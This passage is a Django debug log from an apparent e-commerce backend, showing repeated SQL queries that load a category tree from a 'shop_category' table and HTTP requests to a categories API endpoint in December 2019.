args=(30,) DEBUG 2019-12-19 14:05:32,627 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:05:32,632 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:05:32,635 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:05:32,639 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:05:32,644 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:05:32,648 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:05:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 14:05:33] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 DEBUG 2019-12-19 14:05:39,244 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:05:39,255 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:05:39,261 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:05:39,266 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:05:39,272 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:05:39,276 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:05:39,280 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:05:39,284 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:05:39,288 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:05:39,294 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:05:39,298 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:05:39,302 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:05:39,306 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:05:39,310 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:05:39,315 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:05:39,319 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:05:39,323 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:05:39,327 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:05:39,331 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:05:39,337 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:05:39,341 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:05:39,345 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:05:39,349 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:05:39,353 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:05:39,357 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:05:39,363 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:05:39,367 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:05:39,371 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:05:39,375 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:05:39,379 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:05:39,385 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:05:39,389 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:05:39,392 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:05:39,396 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:05:39,400 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:05:39,407 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:05:39,411 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:05:39,414 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:05:39,420 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:05:39,424 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:05:39,428 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:05:39,433 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:05:39,437 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:05:39,441 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:05:39,445 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:05:39,449 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:05:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:05:39,553 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 14:05:39,559 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 14:05:39] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 14:05:46,530 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:05:46,543 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:05:46,549 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:05:46,554 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:05:46,567 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:05:46,572 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:05:46,576 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:05:46,581 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:05:46,585 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:05:46,590 utils 4252 140031492613888 (0.010) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 14:05:46,591 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:05:46,602 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:05:46,607 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:05:46,611 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", 